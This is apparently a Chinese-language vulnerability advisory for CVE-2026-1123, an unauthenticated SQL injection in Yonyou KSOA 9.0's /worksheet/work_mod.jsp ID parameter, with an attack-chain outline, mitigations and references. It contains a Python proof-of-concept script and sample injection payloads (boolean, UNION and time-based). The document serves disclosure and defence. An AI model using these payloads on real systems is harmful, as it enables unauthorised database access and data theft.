CVE-2026-1123: 用友KSOA 9.0 /worksheet/work

漏洞信息

漏洞编号

CVE-2026-1123

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Yonyou KSOA 9.0

漏洞概述

用友KSOA 9.0存在一处严重的SQL注入漏洞，攻击者可通过对/worksheet/work_mod.jsp文件中的ID参数进行恶意构造，实现未经授权的数据库操作。该漏洞无需任何认证即可被利用，攻击者可远程发起攻击，成功利用后可能导致敏感数据泄露、数据库被篡改或服务器被完全控制。用友作为国内领先的ERP厂商，其KSOA产品广泛应用于企业信息化建设中，该漏洞的存在对企业数据安全构成严重威胁。由于该漏洞的利用代码已公开披露，攻击者可在互联网上轻易获取利用方式，因此建议相关用户立即采取修复措施。

技术细节

该漏洞存在于用友KSOA 9.0的/worksheet/work_mod.jsp文件中，具体为HTTP GET参数处理器中的ID参数处理逻辑存在缺陷。系统在接收用户提交的ID参数后，未对其进行充分的输入验证和SQL语句过滤，直接将用户输入拼接到SQL查询语句中执行。攻击者可通过构造特殊的SQL payloads，如使用UNION SELECT、布尔盲注、时间盲注等技术，实现数据提取或进一步攻击。由于该参数在HTTP GET请求中传递，且系统未部署有效的WAF防护，攻击者可直接利用浏览器或简单工具发起攻击。CVSS 3.1评分7.3（高危）表明该漏洞具有网络可达性、低攻击复杂度和无需认证的特点，对信息系统的机密性、完整性和可用性均产生一定影响。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标服务器上运行的用友KSOA 9.0系统，确认/worksheet/work_mod.jsp端点存在

STEP 2

步骤2: 漏洞探测

通过构造特殊字符和SQL语法测试ID参数，观察系统响应判断是否存在SQL注入漏洞

STEP 3

步骤3: 注入类型识别

使用UNION、布尔盲注或时间盲注等技术确定注入点的具体类型和数据库类型

STEP 4

步骤4: 数据提取

通过SQL注入获取数据库中的敏感信息，如用户凭证、业务数据等

STEP 5

步骤5: 权限提升或持久化

进一步利用获取的信息进行横向移动或植入后门实现持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-1123 PoC - Yonyou KSOA 9.0 SQL Injection
# Target: /worksheet/work_mod.jsp
# Parameter: ID

def exploit_sqli(target_url, payload):
    """
    SQL Injection PoC for CVE-2026-1123
    This demonstrates the vulnerability in Yonyou KSOA 9.0
    """
    target = f"{target_url}/worksheet/work_mod.jsp"
    params = {'ID': payload}
    
    try:
        response = requests.get(target, params=params, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {str(e)}"

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2026-1123.py <target_url>")
        print("Example: python cve-2026-1123.py http://vulnerable-server:8080")
        sys.exit(1)
    
    base_url = sys.argv[1]
    
    # Basic SQL Injection test payloads
    payloads = [
        "1' OR '1'='1",
        "1' UNION SELECT NULL--",
        "1' AND SLEEP(5)--",
        "1' AND 1=1--"
    ]
    
    print(f"[*] Testing CVE-2026-1123 on {base_url}")
    print(f"[*] Target endpoint: /worksheet/work_mod.jsp")
    print("-" * 50)
    
    for payload in payloads:
        print(f"\n[+] Testing payload: {payload}")
        result = exploit_sqli(base_url, payload)
        print(f"Response length: {len(result)} bytes")

影响范围

Yonyou KSOA 9.0

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）使用Web应用防火墙对/worksheet/work_mod.jsp路径进行SQL注入规则过滤；2）通过网络层ACL限制对该路径的访问，仅允许受信任的IP地址访问；3）监控Web服务器日志，关注异常的SQL语法特征请求；4）考虑暂时禁用受影响的功能模块，待官方修复后再恢复使用。建议同时联系用友技术支持获取官方安全建议和补丁信息。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1123
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1123
3 Details https://www.cvedetails.com/cve/CVE-2026-1123/
4 VulDB https://vuldb.com/cve/CVE-2026-1123
5 Link https://github.com/LX-66-LX/cve/issues/9
6 Link https://vuldb.com/?ctiid.341715
7 Link https://vuldb.com/?id.341715
8 Link https://vuldb.com/?submit.734550

CVE-2026-1123: 用友KSOA 9.0 /worksheet/work_mod.jsp SQL注入漏洞